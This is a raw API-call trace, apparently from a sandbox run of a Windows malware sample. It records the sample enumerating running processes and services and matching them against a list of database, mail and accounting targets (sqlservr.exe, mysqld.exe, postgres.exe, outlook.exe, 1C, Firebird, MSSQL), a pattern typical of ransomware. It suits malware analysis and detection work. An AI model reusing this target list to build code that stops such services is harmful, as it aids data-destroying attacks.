	[0144.303] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0144.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0144.303] lstrlenW (lpString="UxSms") returned 5
	[0144.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0144.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0144.303] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0144.303] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0144.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0144.303] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0144.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3cc
	[0144.304] Process32FirstW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0144.305] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0144.305] lstrlenW (lpString="System") returned 6
	[0144.305] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0144.305] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0144.305] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0144.305] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0144.305] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0144.305] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0144.305] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0144.305] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0144.305] lstrlenW (lpString="smss.exe") returned 8
	[0144.305] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0144.305] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0144.305] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0144.305] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0144.306] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0144.306] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0144.306] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0144.306] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0144.306] lstrlenW (lpString="csrss.exe") returned 9
	[0144.306] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0144.306] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0144.306] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0144.306] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0144.306] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0144.306] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0144.306] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0144.306] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0144.306] lstrlenW (lpString="wininit.exe") returned 11
	[0144.306] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0144.306] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0144.306] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0144.307] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0144.307] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0144.307] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0144.307] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0144.307] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0144.307] lstrlenW (lpString="csrss.exe") returned 9
	[0144.307] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0144.307] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0144.307] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0144.307] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0144.307] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0144.307] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0144.307] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0144.307] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0144.307] lstrlenW (lpString="winlogon.exe") returned 12
	[0144.307] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0144.307] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0144.307] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0144.308] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0144.308] lstrlenW (lpString="services.exe") returned 12
	[0144.308] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0144.308] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0144.308] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0144.309] lstrlenW (lpString="lsass.exe") returned 9
	[0144.309] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0144.309] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0144.309] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0144.309] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0144.309] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0144.309] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0144.309] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0144.309] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0144.309] lstrlenW (lpString="lsm.exe") returned 7
	[0144.309] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0144.309] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0144.309] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0144.309] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0144.309] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0144.309] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0144.309] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0144.309] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0144.310] lstrlenW (lpString="svchost.exe") returned 11
	[0144.310] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0144.310] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0144.310] lstrlenW (lpString="svchost.exe") returned 11
	[0144.310] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0144.310] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0144.310] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0144.311] lstrlenW (lpString="svchost.exe") returned 11
	[0144.311] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0144.311] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0144.311] lstrlenW (lpString="svchost.exe") returned 11
	[0144.311] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0144.311] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0144.311] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0144.312] lstrlenW (lpString="svchost.exe") returned 11
	[0144.312] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0144.312] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0144.312] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0144.312] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0144.312] lstrlenW (lpString="audiodg.exe") returned 11
	[0144.312] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0144.313] lstrlenW (lpString="svchost.exe") returned 11
	[0144.313] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0144.313] lstrlenW (lpString="svchost.exe") returned 11
	[0144.313] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0144.313] lstrlenW (lpString="spoolsv.exe") returned 11
	[0144.313] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0144.313] lstrlenW (lpString="svchost.exe") returned 11
	[0144.314] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0144.314] lstrlenW (lpString="taskhost.exe") returned 12
	[0144.314] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0144.314] lstrlenW (lpString="userinit.exe") returned 12
	[0144.314] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0144.314] lstrlenW (lpString="dwm.exe") returned 7
	[0144.315] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0144.315] lstrlenW (lpString="explorer.exe") returned 12
	[0144.315] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0144.315] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0144.315] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0144.315] lstrlenW (lpString="reader_sl.exe") returned 13
	[0144.315] Process32NextW (in: hSnapshot=0x3cc, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0144.316] CloseHandle (hObject=0x3cc) returned 1
	[0144.316] Sleep (dwMilliseconds=0x1f4) 
	[0145.180] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616f80
	[0145.459] EnumServicesStatusExW (in: hSCManager=0xb616f80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0145.459] GetLastError () returned 0xea
	[0145.459] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0145.459] EnumServicesStatusExW (in: hSCManager=0xb616f80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0145.460] CloseServiceHandle (hSCObject=0xb616f80) returned 1
	[0145.460] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0145.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0145.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0145.460] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0145.460] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0145.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0145.460] lstrlenW (lpString="AudioSrv") returned 8
	[0145.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0145.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0145.460] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0145.460] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0145.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0145.460] lstrlenW (lpString="BFE") returned 3
	[0145.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0145.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0145.461] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0145.461] lstrlenW (lpString="CryptSvc") returned 8
	[0145.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0145.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0145.461] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0145.461] lstrlenW (lpString="CscService") returned 10
	[0145.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0145.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0145.461] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0145.461] lstrlenW (lpString="DcomLaunch") returned 10
	[0145.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0145.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0145.461] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0145.461] lstrlenW (lpString="Dhcp") returned 4
	[0145.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0145.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0145.461] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0145.462] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0145.462] lstrlenW (lpString="Dnscache") returned 8
	[0145.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0145.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0145.462] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0145.462] lstrlenW (lpString="DPS") returned 3
	[0145.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0145.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0145.462] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0145.462] lstrlenW (lpString="eventlog") returned 8
	[0145.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0145.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0145.462] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0145.462] lstrlenW (lpString="EventSystem") returned 11
	[0145.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0145.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0145.462] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0145.462] lstrlenW (lpString="gpsvc") returned 5
	[0145.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0145.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0145.462] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0145.462] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0145.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0145.463] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0145.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0145.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0145.463] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0145.463] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0145.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0145.463] lstrlenW (lpString="lmhosts") returned 7
	[0145.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0145.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0145.463] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0145.463] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0145.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0145.463] lstrlenW (lpString="MMCSS") returned 5
